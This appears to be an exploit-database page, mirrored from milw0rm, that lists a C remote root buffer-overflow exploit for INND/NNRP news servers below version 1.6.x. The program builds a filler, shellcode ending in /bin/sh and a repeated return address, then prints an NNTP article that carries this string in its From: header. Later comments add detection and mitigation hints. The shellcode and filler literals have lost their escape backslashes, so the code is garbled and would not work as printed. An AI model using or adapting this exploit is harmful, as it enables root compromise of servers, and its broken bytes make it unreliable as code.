INND/NNRP < 1.6.x – Remote Overflow
漏洞ID | 1053494 | 漏洞类型 | |
发布时间 | 2000-11-30 | 更新时间 | 2000-11-30 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* INND/NNRP remote root overflow
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
/*
 * Layout constants for the buffer that main() builds. Every value is
 * hard-coded; nothing here is derived from the target at run time.
 */
/* Default for `ofs`, which main() subtracts from RET; argv[1] overrides it. */
#define DEFAULT_OFFSET 792
/* Length budget main() uses when it computes the filler length (noplen). */
#define BUFFER_SIZE 796
/* Size of the tail region; main() writes ADDRS / 4 copies of the address there. */
#define ADDRS 80
/* Base address constant; the value written into the tail is RET - ofs. */
#define RET 0xefbf95e4
/* Filler pattern; main() copies its first four characters repeatedly.
 * Literal kept exactly as published on the page. */
#define NOP "x08x21x02x80"
/*
 * Builds one long string in a heap buffer (filler, then the execshell
 * bytes, then a repeated address) and prints an NNTP-style article to
 * stdout with that string substituted into the From: header. The program
 * performs no network I/O itself; it only writes to stdout and stderr.
 *
 * Reviewer notes for defenders:
 *  - The only field that carries the long string is From: (see the final
 *    printf), so the oversized value reaches the server as an article
 *    header. Presumably the affected code path is header handling in the
 *    versions named in the advisory title (INND/NNRP < 1.6.x) -- the page
 *    states that vulnerability details are not disclosed, so confirm
 *    against the vendor advisory.
 *  - What to look for: a posted article whose From: header is several
 *    hundred bytes long and ends in many repeats of one fixed-width value.
 *    Ordinary From: headers are nowhere near BUFFER_SIZE bytes.
 *  - Mitigation is server-side: run a release outside the affected range
 *    and make sure header values are length-checked before being copied
 *    into fixed-size buffers.
 *  - NOTE(review): the string literals below are kept byte-for-byte as
 *    published. This copy of the listing looks extraction-damaged and has
 *    not been verified to build or run.
 */
int main(argc, argv)
int argc;
char **argv;
{
char *buff = NULL, *ptr = NULL;
u_long *addr_ptr = NULL;
int ofs = DEFAULT_OFFSET;
int noplen;
int i, j;
/* Payload block placed between the filler and the address tail; the
 * literal ends with the path "/bin/sh". Contents are not analysed here. */
u_char execshell[] =
"x34x16x05x06x96xd6x05x34x20x20x08x01"
"xe4x20xe0x08x0bx5ax02x9axe8x3fx1fxfd"
"x08x21x02x80x34x02x01x02x08x41x04x02"
"x60x40x01x62xb4x5ax01x54x0bx39x02x99"
"x0bx18x02x98x34x16x04xbex20x20x08x01"
"xe4x20xe0x08x96xd6x05x34xdexadxcaxfe"
"/bin/sh";
/* Optional first argument replaces the default offset; atoi() does no
 * validation, so non-numeric input silently becomes 0. */
if(argc > 1)
ofs = atoi(argv[1]);
/* Fixed 4096-byte work buffer; malloc() does not zero it. */
if(!(buff = malloc(4096)))
{
(void)fprintf(stderr, "can't allocate memoryn");
exit(1);
}
ptr = buff;
/* Filler length = budget minus the payload block minus the address tail. */
noplen = BUFFER_SIZE - strlen(execshell) - ADDRS;
/* Fill the front of the buffer with repeats of the first four characters of NOP. */
for(i = 0; i < noplen / 4; i++)
{
for(j = 0; j < 4; j++)
*ptr++ = NOP[j];
}
*ptr += noplen;
/* Append the execshell bytes after the filler. */
for(i = 0; i < strlen(execshell); i++)
*ptr++ = execshell[i];
/* Append ADDRS / 4 copies of (RET - ofs) as u_long values. */
addr_ptr = (unsigned long *)ptr;
for(i = 0; i < ADDRS / 4; i++)
*addr_ptr++ = (RET - ofs);
/* Write one final byte after the address tail. */
ptr = (char *)addr_ptr;
*ptr = ' ';
/* Diagnostic on stderr: length of the built string and the address used. */
(void)fprintf(stderr, "shellcode len: %d, RET: %xn", strlen(buff), RET-ofs);
/* Emit the article on stdout: Path, From, Newsgroups, Subject, Message-ID,
 * Date and Lines headers, a one-line body, and a lone "." line. `buff` is
 * substituted into the From: header, which is the field a server-side
 * length check or detection rule should focus on. */
printf(
"Path: babcia!padlinan"
"From: babunia @%sn"
"Newsgroups: pl.testn"
"Subject: testn"
"Message-ID: <[email protected]>n"
"Date: 26 Aug 1999 10:36:54 +0200n"
"Lines: 1n"
"n"
"west. test it.n"
".n", buff);
}
// milw0rm.com [2000-11-30]